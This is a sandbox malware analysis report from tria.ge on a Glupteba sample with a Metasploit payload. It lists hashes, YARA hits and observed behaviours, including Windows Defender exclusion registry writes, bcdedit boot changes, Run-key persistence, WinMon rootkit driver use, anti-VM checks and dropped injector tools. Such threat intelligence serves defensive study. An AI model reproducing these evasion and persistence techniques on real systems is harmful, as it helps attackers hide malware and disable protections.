Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/12/2024, 04:24 UTC
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe
-
Size
4.4MB
-
MD5
08f5c8339bbf8133aa584b9ab669ad89
-
SHA1
51ded7dfbb52a4ef1e7231768d74004fdb7bfdd9
-
SHA256
316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5
-
SHA512
a90de73579a36127fdc380f3981f200123f0aedb8c21157addbbcf2bd966984576ae384102d674f622c348e3aaff3fadabc23204ab01caec0dc154b3fa7d76cd
-
SSDEEP
98304:NKxaIBX76tenKg8WLHLk9R/IJssRTEVrWxXzN9lH:N67BWteKgZLk9exRTjxjN
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba family
-
Glupteba payload 20 IoCs
resource yara_rule behavioral1/memory/1684-2-0x0000000004450000-0x0000000004D76000-memory.dmp family_glupteba behavioral1/memory/1684-3-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1684-7-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba behavioral1/memory/1684-6-0x0000000004450000-0x0000000004D76000-memory.dmp family_glupteba behavioral1/memory/1684-4-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2808-17-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-50-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-58-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-76-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-96-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-102-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-103-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-104-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-105-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-106-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-107-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-108-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-109-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-110-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba behavioral1/memory/2816-111-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ThrobbingBush = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 1868 bcdedit.exe 340 bcdedit.exe 1324 bcdedit.exe 1520 bcdedit.exe 2052 bcdedit.exe 1088 bcdedit.exe 916 bcdedit.exe 2348 bcdedit.exe 2268 bcdedit.exe 3052 bcdedit.exe 3044 bcdedit.exe 2640 bcdedit.exe 988 bcdedit.exe 844 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2824 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Executes dropped EXE 4 IoCs
pid Process 2816 csrss.exe 2788 patch.exe 1512 dsefix.exe 1736 injector.exe -
Loads dropped DLL 13 IoCs
pid Process 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 2808 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe 864 Process not Found 2788 patch.exe 2788 patch.exe 2788 patch.exe 2788 patch.exe 2788 patch.exe 2788 patch.exe 2788 patch.exe 2788 patch.exe 2816 csrss.exe 2816 csrss.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ThrobbingBush = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ThrobbingBush = "\"C:\\Windows\\rss\\csrss.exe\"" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\rss JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe File created C:\Windows\rss\csrss.exe JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe File created C:\Windows\Logs\CBS\CbsPersist_20241225042424.cab makecab.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe -
GoLang User-Agent 5 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 10 Go-http-client/1.1 HTTP User-Agent header 12 Go-http-client/1.1 HTTP User-Agent header 25 Go-http-client/1.1 HTTP User-Agent header 26 Go-http-client/1.1 HTTP User-Agent header 38 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" JaffaCakes118_316a8056443898a16cc575ae3c4885d80d6b066d5f49036558545b5a816f39f5.exe -
